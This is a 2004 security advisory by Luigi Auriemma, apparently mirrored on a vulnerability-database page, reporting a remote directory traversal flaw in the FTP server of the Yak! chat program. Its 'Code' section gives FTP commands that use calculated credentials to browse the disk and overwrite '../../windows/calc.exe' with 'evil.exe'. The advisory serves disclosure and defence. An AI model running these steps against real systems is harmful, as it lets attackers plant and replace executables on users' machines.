Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLuigi AuriemmaPACKETSTORM:34741
HistoryOct 26, 2004 - 12:00 a.m.

yak212.txt

2004-10-2600:00:00
Luigi Auriemma
packetstormsecurity.com
15
JSON
`  
#######################################################################  
  
Luigi Auriemma  
  
Application: Yak!  
http://www.digicraft.com.au/yak/  
Versions: <= 2.1.2  
Platforms: Windows  
Bug: directory traversal (upload)  
Exploitation: remote  
Date: 15 October 2004  
Author: Luigi Auriemma  
e-mail: [email protected]  
web: http://aluigi.altervista.org  
  
  
#######################################################################  
  
  
1) Introduction  
2) Bug  
3) The Code  
4) Fix  
  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
Yak! is a serverless chat system for Windows that lets people to chat  
and to exchange files.  
  
  
#######################################################################  
  
======  
2) Bug  
======  
  
  
When the program starts it creates an username and password for each  
IP address of the computer's network interfaces.  
These login informations are needed to grant the access to the built-in  
FTP server (used only to receive files) to other Yak! hosts.  
  
The problem is just in this FTP server because the input of the clients  
is not filtered so is possible to upload files everywhere in the disk  
on which is located the upload directory of Yak! (by default the system's  
temporary folder) overwriting those existent.  
  
Naturally is also possible to see any remote directory and file (but  
seems only c: can be surfed also if the upload folder is set on another  
disk) while download is avoided by the program because it has been  
designed to receive files only.  
  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
  
Do the following operations:  
  
Download my "Yak! username and password calculator"  
http://aluigi.altervista.org/papers/yakcalc.zip to retrieve the  
username and password to access to the FTP server of a specific Yak!  
host.  
  
Then connect to the Yak! FTP port, usually 3535:  
  
C:\>ftp  
ftp> open HOST 3535  
  
Enter the calculated username and password and upload your files like  
in the following example:  
  
dir /  
dir ../../windows/  
  
put  
evil.exe  
../../windows/calc.exe  
  
(slash and backslash have the same effect)  
  
  
#######################################################################  
  
======  
4) Fix  
======  
  
  
No fix.  
Vendor has been contacted exactly one month ago but no patch is  
available.  
  
  
#######################################################################  
  
  
---   
Luigi Auriemma  
http://aluigi.altervista.org  
  
`
JSON